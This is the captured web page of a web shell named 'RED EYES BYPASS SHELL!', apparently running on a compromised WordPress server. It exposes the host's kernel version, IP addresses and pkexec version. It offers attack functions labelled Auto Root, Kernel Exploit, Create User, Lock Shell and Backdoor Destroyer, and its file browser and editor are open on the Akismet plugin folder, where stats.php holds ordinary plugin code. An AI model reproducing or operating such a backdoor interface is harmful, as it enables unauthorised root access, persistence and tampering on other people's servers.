Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
grad /
new /
wp-content /
plugins /
akismet /
views /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
activate.php
138
B
-rwxr-xr-x
compatible-plugins.php
4.26
KB
-rwxr-xr-x
config.php
15.47
KB
-rwxr-xr-x
connect-jp.php
457
B
-rwxr-xr-x
enter.php
1.02
KB
-rwxr-xr-x
get.php
1.24
KB
-rwxr-xr-x
logo.php
770
B
-rwxr-xr-x
notice.php
18.23
KB
-rwxr-xr-x
predefined.php
312
B
-rwxr-xr-x
setup-jetpack.php
4.24
KB
-rwxr-xr-x
setup.php
3.32
KB
-rwxr-xr-x
start.php
909
B
-rwxr-xr-x
stats.php
1.06
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stats.php
<div id="akismet-plugin-container"> <div class="akismet-masthead"> <div class="akismet-masthead__inside-container"> <?php Akismet::view( 'logo', array( 'include_logo_link' => true ) ); ?> <div class="akismet-masthead__back-link-container"> <a class="akismet-masthead__back-link" href="<?php echo esc_url( Akismet_Admin::get_page_url() ); ?>"><?php esc_html_e( 'Back to settings', 'akismet' ); ?></a> </div> </div> </div> <?php /* name attribute on iframe is used as a cache-buster here to force Firefox to load the new style charts: https://bugzilla.mozilla.org/show_bug.cgi?id=356558 */ ?> <iframe id="stats-iframe" src="<?php echo esc_url( sprintf( 'https://tools.akismet.com/1.0/user-stats.php?blog=%s&token=%s&locale=%s&is_redecorated=1', urlencode( get_option( 'home' ) ), urlencode( Akismet::get_access_token() ), esc_attr( get_user_locale() ) ) ); ?>" name="<?php echo esc_attr( 'user-stats- ' . filemtime( __FILE__ ) ); ?>" width="100%" height="2500px" frameborder="0" title="<?php echo esc_attr__( 'Akismet detailed stats', 'akismet' ); ?>"></iframe> </div>
Close